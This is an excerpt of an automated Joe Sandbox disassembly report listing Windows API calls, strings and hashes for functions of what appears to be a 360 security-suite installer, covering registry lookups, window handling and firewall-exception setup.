                                                                                                                                                                                                                      • API ID: _memset$Path$File$DeleteExistsH_prolog3Temp$CombineCreateDirectory_wcscat
                                                                                                                                                                                                                      • String ID: {A44B7723-4283-41b8-B9C0-6B1983C61382}.tmp
                                                                                                                                                                                                                      • API String ID: 3543345046-342223665
                                                                                                                                                                                                                      • Opcode ID: 57a057f805a71b92d1eb9c43484240e221dc5e4c35ac8ab55ee07abd4ed500e4
                                                                                                                                                                                                                      • Instruction ID: 0d5c37fbbe5e3ff7290619d487fc1e3590c0ab0efcf017d072336a7ef212c6be
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 57a057f805a71b92d1eb9c43484240e221dc5e4c35ac8ab55ee07abd4ed500e4
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 533173719002499BDB14EFA5DD92FFEB3B8FF04314F108429E615A7281EF746A09CBA5
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • _memset.LIBCMT ref: 00AB7216
                                                                                                                                                                                                                      • SHGetValueW.SHLWAPI(80000002,SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\360safe.exe,Path,?,?,?,?,?,00B5CDA4), ref: 00AB7239
                                                                                                                                                                                                                      • PathCombineW.SHLWAPI(?,?,360safe.exe,?,?,?,00B5CDA4), ref: 00AB7269
                                                                                                                                                                                                                      • PathFileExistsW.SHLWAPI(?,?,?,00B5CDA4), ref: 00AB7273
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      • SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\360safe.exe, xrefs: 00AB722F
                                                                                                                                                                                                                      • 360safe.exe, xrefs: 00AB725D
                                                                                                                                                                                                                      • Path, xrefs: 00AB722A
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 0000000F.00000002.2571589051.0000000000A71000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00A70000, based on PE: true
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2571457677.0000000000A70000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2571976270.0000000000B2E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2572066890.0000000000B53000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2572244179.0000000000B56000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2572331345.0000000000B60000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2572331345.0000000000E4D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_15_2_a70000_inst.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: Path$CombineExistsFileValue_memset
                                                                                                                                                                                                                      • String ID: 360safe.exe$Path$SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\360safe.exe
                                                                                                                                                                                                                      • API String ID: 1538502309-1025180333
                                                                                                                                                                                                                      • Opcode ID: 2d39699b7197d8b715fa0363a0084d80c7f7e9c47925092bce2b3fbb3a0d2b36
                                                                                                                                                                                                                      • Instruction ID: eda29da42d27048f102925e83f3898b0937e9dfda4a1261c65d892752810545e
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 2d39699b7197d8b715fa0363a0084d80c7f7e9c47925092bce2b3fbb3a0d2b36
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 0611ED71D0411C9BDB74EBA5DD49BEEBBBCAF08704F20412AF515E3192DBB15A48CB90
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • __EH_prolog3.LIBCMT ref: 00ACFF7B
                                                                                                                                                                                                                      • GetDlgItem.USER32(?,00000415), ref: 00ACFF9A
                                                                                                                                                                                                                      • _memset.LIBCMT ref: 00ACFFBD
                                                                                                                                                                                                                      • GetWindowTextW.USER32(?,00000000,000003FF), ref: 00ACFFD1
                                                                                                                                                                                                                      • IsWindowVisible.USER32(?), ref: 00ACFFEE
                                                                                                                                                                                                                        • Part of subcall function 00A87FA1: __wcsicoll.LIBCMT ref: 00A87FB9
                                                                                                                                                                                                                      • ShowWindow.USER32(?,00000000), ref: 00AD0021
                                                                                                                                                                                                                      • GetFocus.USER32 ref: 00AD00D6
                                                                                                                                                                                                                        • Part of subcall function 00AC48A3: SendMessageW.USER32(?,000000B1,?,?), ref: 00AC48BC
                                                                                                                                                                                                                        • Part of subcall function 00AC48A3: SendMessageW.USER32(?,000000B7,00000000,00000000), ref: 00AC48CF
                                                                                                                                                                                                                      • SetFocus.USER32(?), ref: 00AD00F0
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 0000000F.00000002.2571589051.0000000000A71000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00A70000, based on PE: true
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2571457677.0000000000A70000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2571976270.0000000000B2E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2572066890.0000000000B53000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2572244179.0000000000B56000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2572331345.0000000000B60000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2572331345.0000000000E4D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_15_2_a70000_inst.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: Window$FocusMessageSend$H_prolog3ItemShowTextVisible__wcsicoll_memset
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 3004406801-0
                                                                                                                                                                                                                      • Opcode ID: 13d1b0ea51f832dae5262c699ac265f29685f7c9a8e3bb89079d0899dbf03dbd
                                                                                                                                                                                                                      • Instruction ID: 3c49bc542947c69e10ac60b04c6a150c3dad4bdd5b7bccd9efb1023f72aabca6
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 13d1b0ea51f832dae5262c699ac265f29685f7c9a8e3bb89079d0899dbf03dbd
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 2A71AD71900249AFDB24EFA0CD56FFEB7B5BF14304F108629F516A7292EB306A44CB61
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • __EH_prolog3.LIBCMT ref: 00AC63B9
                                                                                                                                                                                                                      • GetDlgItem.USER32(?,000003EE), ref: 00AC63D8
                                                                                                                                                                                                                      • _memset.LIBCMT ref: 00AC63F9
                                                                                                                                                                                                                      • GetWindowTextW.USER32(?,00000000,000003FF), ref: 00AC640D
                                                                                                                                                                                                                      • IsWindowVisible.USER32(?), ref: 00AC6434
                                                                                                                                                                                                                      • SendMessageW.USER32(?,000000F0,00000000,00000000), ref: 00AC6449
                                                                                                                                                                                                                      • GetFocus.USER32 ref: 00AC6488
                                                                                                                                                                                                                      • SetFocus.USER32(?), ref: 00AC64A2
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 0000000F.00000002.2571589051.0000000000A71000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00A70000, based on PE: true
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2571457677.0000000000A70000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2571976270.0000000000B2E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2572066890.0000000000B53000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2572244179.0000000000B56000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2572331345.0000000000B60000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2572331345.0000000000E4D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_15_2_a70000_inst.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: FocusWindow$H_prolog3ItemMessageSendTextVisible_memset
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 1096848440-0
                                                                                                                                                                                                                      • Opcode ID: 50eda210b077339d139d25d74b30a19f862fdf76d8400d37d00edc6bfca60156
                                                                                                                                                                                                                      • Instruction ID: 9905b231a25882d01b5c02e0c9ccd6a127c823e01d03ba45bf25e1373c2217b7
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 50eda210b077339d139d25d74b30a19f862fdf76d8400d37d00edc6bfca60156
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 33516B71900209AFDB24EBA0DE45FFEB7B8BF14705F10852DE516A7191EF70AA04CBA1
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • _memset.LIBCMT ref: 00A746A1
                                                                                                                                                                                                                      • GetFileSizeEx.KERNEL32(?,?,00000000,?,00000003), ref: 00A746B3
                                                                                                                                                                                                                      • _malloc.LIBCMT ref: 00A746E3
                                                                                                                                                                                                                      • SetLastError.KERNEL32(00000008,?,?,?,00004000), ref: 00A746F3
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 0000000F.00000002.2571589051.0000000000A71000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00A70000, based on PE: true
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2571457677.0000000000A70000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2571976270.0000000000B2E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2572066890.0000000000B53000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2572244179.0000000000B56000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2572331345.0000000000B60000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2572331345.0000000000E4D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_15_2_a70000_inst.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: ErrorFileLastSize_malloc_memset
                                                                                                                                                                                                                      • String ID: INIT$PE
                                                                                                                                                                                                                      • API String ID: 942205088-3949469810
                                                                                                                                                                                                                      • Opcode ID: bec1fc1444be3e978c04ba4392e802a5e32cb3af2840ea6396a3fe26f1a23418
                                                                                                                                                                                                                      • Instruction ID: a3d38b239ba94f1706a79a0d4752d1edfaf8ce67b5e5001a39a5a320e14573b3
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: bec1fc1444be3e978c04ba4392e802a5e32cb3af2840ea6396a3fe26f1a23418
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: A6E18DB1A043419BDB24DF24DD41B6BBBE4EB98704F14C92AF99C9B241E771DD04CB92
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • __EH_prolog3_catch.LIBCMT ref: 00A89965
                                                                                                                                                                                                                        • Part of subcall function 00A874B2: CLSIDFromProgID.COMBASE(?,?), ref: 00A874D1
                                                                                                                                                                                                                        • Part of subcall function 00A874B2: CoCreateInstance.OLE32(?,?,?,00B2E8A0), ref: 00A874E9
                                                                                                                                                                                                                      • SysFreeString.OLEAUT32(?), ref: 00A89A94
                                                                                                                                                                                                                      • SysFreeString.OLEAUT32(?), ref: 00A89B14
                                                                                                                                                                                                                      • SysFreeString.OLEAUT32(?), ref: 00A89BB9
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 0000000F.00000002.2571589051.0000000000A71000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00A70000, based on PE: true
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2571457677.0000000000A70000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2571976270.0000000000B2E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2572066890.0000000000B53000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2572244179.0000000000B56000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2572331345.0000000000B60000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2572331345.0000000000E4D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_15_2_a70000_inst.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: FreeString$CreateFromH_prolog3_catchInstanceProg
                                                                                                                                                                                                                      • String ID: HNetCfg.FwAuthorizedApplication$HNetCfg.FwMgr
                                                                                                                                                                                                                      • API String ID: 3810993049-1951265404
                                                                                                                                                                                                                      • Opcode ID: 205a9799077afb3dcf244e582d9d1c6205367e8504102fd59d19b4003d4e507d
                                                                                                                                                                                                                      • Instruction ID: 24344a781ecdb3dcfd38d4720c9ec0f08b7aa39d693ab4b69c41d8d025fd6cf9
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 205a9799077afb3dcf244e582d9d1c6205367e8504102fd59d19b4003d4e507d
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: E4B1DA74A00249EFCF14EFE4C9889AEBBB5FF49305F284499E546EB251C7359D46CB20
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • __EH_prolog3_catch.LIBCMT ref: 00A8D0A2
                                                                                                                                                                                                                        • Part of subcall function 00A8CE6B: __EH_prolog3_GS.LIBCMT ref: 00A8CE75
                                                                                                                                                                                                                        • Part of subcall function 00A8CE6B: _memset.LIBCMT ref: 00A8CEE2
                                                                                                                                                                                                                        • Part of subcall function 00A8CE6B: GetLongPathNameW.KERNEL32(00000000,?,00000104), ref: 00A8CEF9
                                                                                                                                                                                                                        • Part of subcall function 00A8CFE7: __EH_prolog3.LIBCMT ref: 00A8CFEE
                                                                                                                                                                                                                      • SetCurrentDirectoryW.KERNEL32(?,?,00B3CC68,00000000,?,themes,00000018,00A8BEB5,00000000), ref: 00A8D0F2
                                                                                                                                                                                                                        • Part of subcall function 00AD4C7D: GetModuleHandleW.KERNEL32(sites.dll,00A8D12D,00B2F258,?,00000000,00000000), ref: 00AD4C8B
                                                                                                                                                                                                                      • PathFileExistsW.SHLWAPI(00000000,00000000), ref: 00A8D1AF
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 0000000F.00000002.2571589051.0000000000A71000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00A70000, based on PE: true
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2571457677.0000000000A70000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2571976270.0000000000B2E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2572066890.0000000000B53000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2572244179.0000000000B56000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2572331345.0000000000B60000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2572331345.0000000000E4D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_15_2_a70000_inst.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: Path$CurrentDirectoryExistsFileH_prolog3H_prolog3_H_prolog3_catchHandleLongModuleName_memset
                                                                                                                                                                                                                      • String ID: \NewInstallAir\NewInstallAir.ui$\theme_NewInstallAir.xml$themes
                                                                                                                                                                                                                      • API String ID: 314926721-3980048744
                                                                                                                                                                                                                      • Opcode ID: dec0c6776c07eefe1bcc835d80509f6c69f0afc38ad301bf2757d32477cac49d
                                                                                                                                                                                                                      • Instruction ID: 29f0e6b9e16e25b617312f815312b1e613bc6d53c6a13fa03c99d6ed9cdde77e
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: dec0c6776c07eefe1bcc835d80509f6c69f0afc38ad301bf2757d32477cac49d
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 09517E71A00209DBDF15FBE4CA49ABEBBB9AF45710F144158F116A72C2CB349E05CBB2
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • __EH_prolog3.LIBCMT ref: 00AA8CA6
                                                                                                                                                                                                                        • Part of subcall function 00AB72A6: __EH_prolog3.LIBCMT ref: 00AB72C5
                                                                                                                                                                                                                        • Part of subcall function 00AB72A6: _memset.LIBCMT ref: 00AB72EC
                                                                                                                                                                                                                        • Part of subcall function 00AB73D5: __EH_prolog3.LIBCMT ref: 00AB73F4
                                                                                                                                                                                                                        • Part of subcall function 00AB73D5: _memset.LIBCMT ref: 00AB7422
                                                                                                                                                                                                                      • InterlockedExchange.KERNEL32(?,00003001), ref: 00AA8E38
                                                                                                                                                                                                                        • Part of subcall function 00A8AFB8: __EH_prolog3.LIBCMT ref: 00A8AFBF
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 0000000F.00000002.2571589051.0000000000A71000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00A70000, based on PE: true
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2571457677.0000000000A70000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2571976270.0000000000B2E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2572066890.0000000000B53000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2572244179.0000000000B56000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2572331345.0000000000B60000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2572331345.0000000000E4D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_15_2_a70000_inst.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: H_prolog3$_memset$ExchangeInterlocked
                                                                                                                                                                                                                      • String ID: .dir$360Installer$\Setup.ini$\custom_wnd.ini
                                                                                                                                                                                                                      • API String ID: 3606139519-1812597268
                                                                                                                                                                                                                      • Opcode ID: f89f9f7e06638cf8f3c71572b4eebf9f35976be7bd1c2e07c98c99d0780ccf03
                                                                                                                                                                                                                      • Instruction ID: 0f87595057fbb33f5c76f4f29aa984c9f06e43efb3fb92cfbded4b9749967361
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: f89f9f7e06638cf8f3c71572b4eebf9f35976be7bd1c2e07c98c99d0780ccf03
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: F651BE71900249AFCB14EBF4CE96AFE77B8AF15300F104569F216A72D2DF74AA04CB61
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • _memset.LIBCMT ref: 00AF2FCC
                                                                                                                                                                                                                      • SHGetValueA.SHLWAPI(80000002,Software\360Safe\Liveup,mid,?,?,?,?,00000400), ref: 00AF2FF5
                                                                                                                                                                                                                      • _memset.LIBCMT ref: 00AF30A2
                                                                                                                                                                                                                      • lstrcmpiA.KERNEL32(?,?), ref: 00AF30CA
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 0000000F.00000002.2571589051.0000000000A71000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00A70000, based on PE: true
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2571457677.0000000000A70000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2571976270.0000000000B2E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2572066890.0000000000B53000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2572244179.0000000000B56000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2572331345.0000000000B60000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2572331345.0000000000E4D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_15_2_a70000_inst.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: _memset$Valuelstrcmpi
                                                                                                                                                                                                                      • String ID: Software\360Safe\Liveup$mid
                                                                                                                                                                                                                      • API String ID: 999496690-2395435937
                                                                                                                                                                                                                      • Opcode ID: 835f943ca0fb1acc330c8e0b6a4564235eaf2111749ace502a28f5d975ad7698
                                                                                                                                                                                                                      • Instruction ID: 085719a486d5f19a223f9d0edbbc3f7b60dfa2dad57917dbfb6199642ad6f11b
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 835f943ca0fb1acc330c8e0b6a4564235eaf2111749ace502a28f5d975ad7698
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 2441E4325043498BDB34CB74C951BFB77E8AF85704F04495EF69A87141EF719A09CBA2
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • CreateSolidBrush.GDI32(00FFFFFF), ref: 00ACF81D
                                                                                                                                                                                                                      • GetDlgItem.USER32(?,0000040F), ref: 00ACF84A
                                                                                                                                                                                                                        • Part of subcall function 00AC3197: InvalidateRect.USER32(?,00000000,00000000,?,?,00AC0207,?), ref: 00AC31AD
                                                                                                                                                                                                                      • GetDlgItem.USER32(?,000003EB), ref: 00ACF8CF
                                                                                                                                                                                                                      • GetDlgItem.USER32(?,00000410), ref: 00ACF925
                                                                                                                                                                                                                        • Part of subcall function 00ABF7D0: SetWindowLongW.USER32(?,000000FC,?), ref: 00ABF7F6
                                                                                                                                                                                                                      • GetDlgItem.USER32(?,000003EC), ref: 00ACF965
                                                                                                                                                                                                                        • Part of subcall function 00AA6C96: SetWindowLongW.USER32(?,000000FC,?), ref: 00AA6CBC
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 0000000F.00000002.2571589051.0000000000A71000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00A70000, based on PE: true
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2571457677.0000000000A70000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2571976270.0000000000B2E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2572066890.0000000000B53000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2572244179.0000000000B56000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2572331345.0000000000B60000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2572331345.0000000000E4D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_15_2_a70000_inst.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: Item$LongWindow$BrushCreateInvalidateRectSolid
                                                                                                                                                                                                                      • String ID: PNG
                                                                                                                                                                                                                      • API String ID: 3239997845-364855578
                                                                                                                                                                                                                      • Opcode ID: 6f85e71197841036043f298650ce7daefb9357d9a27167e7b68960e344afe174
                                                                                                                                                                                                                      • Instruction ID: e4afd17cac1b29a4aa895fdf185f4abec7bcdbf6cb5dfd5afa8057ec0fc4b1d0
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 6f85e71197841036043f298650ce7daefb9357d9a27167e7b68960e344afe174
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: DB416D31200B04AFE725AB60CD82FABB7A9EF05714F044A2DF1AA565E2DF657914CB11
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • GetClientRect.USER32(00000005,?), ref: 00AC4AAC
                                                                                                                                                                                                                      • MoveWindow.USER32(?,?,00000104,000000AF,00000050,00000001,?,00000000,?,00AA8E02,00000000,?,?,360Installer,00000000), ref: 00AC4AE4
                                                                                                                                                                                                                      • MoveWindow.USER32(?,?,000000CE,000000AF,00000050,00000001,?,00000000,?,00AA8E02,00000000,?,?,360Installer,00000000), ref: 00AC4B04
                                                                                                                                                                                                                      • ShowWindow.USER32(?,00000000,?,00000000,?,00AA8E02,00000000,?,?,360Installer,00000000,?,.dir,?), ref: 00AC4B17
                                                                                                                                                                                                                      • DestroyWindow.USER32(?,?,00000000,?,00AA8E02,00000000,?,?,360Installer,00000000,?,.dir,?), ref: 00AC4B2E
                                                                                                                                                                                                                      • ShowWindow.USER32(?,00000000,?,00000000,?,00AA8E02,00000000,?,?,360Installer,00000000,?,.dir,?), ref: 00AC4B3B
                                                                                                                                                                                                                      • ShowWindow.USER32(?,00000001,?,00000000,?,00AA8E02,00000000,?,?,360Installer,00000000,?,.dir,?), ref: 00AC4B47
                                                                                                                                                                                                                        • Part of subcall function 00AB58F3: __EH_prolog3.LIBCMT ref: 00AB58FA
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 0000000F.00000002.2571589051.0000000000A71000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00A70000, based on PE: true
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2571457677.0000000000A70000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2571976270.0000000000B2E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2572066890.0000000000B53000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2572244179.0000000000B56000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2572331345.0000000000B60000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2572331345.0000000000E4D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_15_2_a70000_inst.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: Window$Show$Move$ClientDestroyH_prolog3Rect
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 1342398966-0
                                                                                                                                                                                                                      • Opcode ID: 3c61e3b4adbd1d5d1df8d8ad222a4c5044d3e5713baf024c964d0a607a020ee4
                                                                                                                                                                                                                      • Instruction ID: 5168ce8c89b23ae87ff27f4537bb8be93b25fdf167ec7b55ff9445d65a4fb367
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 3c61e3b4adbd1d5d1df8d8ad222a4c5044d3e5713baf024c964d0a607a020ee4
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 86219076600615BBEB206FB9CD85FEF7BB9BF48305F04092CB666D2191DB71A9008B94
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • ___set_flsgetvalue.LIBCMT ref: 00AFEABD
                                                                                                                                                                                                                      • __calloc_crt.LIBCMT ref: 00AFEAC9
                                                                                                                                                                                                                      • __getptd.LIBCMT ref: 00AFEAD6
                                                                                                                                                                                                                      • __initptd.LIBCMT ref: 00AFEADF
                                                                                                                                                                                                                      • CreateThread.KERNEL32(?,?,00AFEA09,00000000,?,?), ref: 00AFEB0D
                                                                                                                                                                                                                      • GetLastError.KERNEL32(?,?,?,?,?,?,00000000), ref: 00AFEB17
                                                                                                                                                                                                                      • __dosmaperr.LIBCMT ref: 00AFEB2F
                                                                                                                                                                                                                        • Part of subcall function 00AF98D1: __getptd_noexit.LIBCMT ref: 00AF98D1
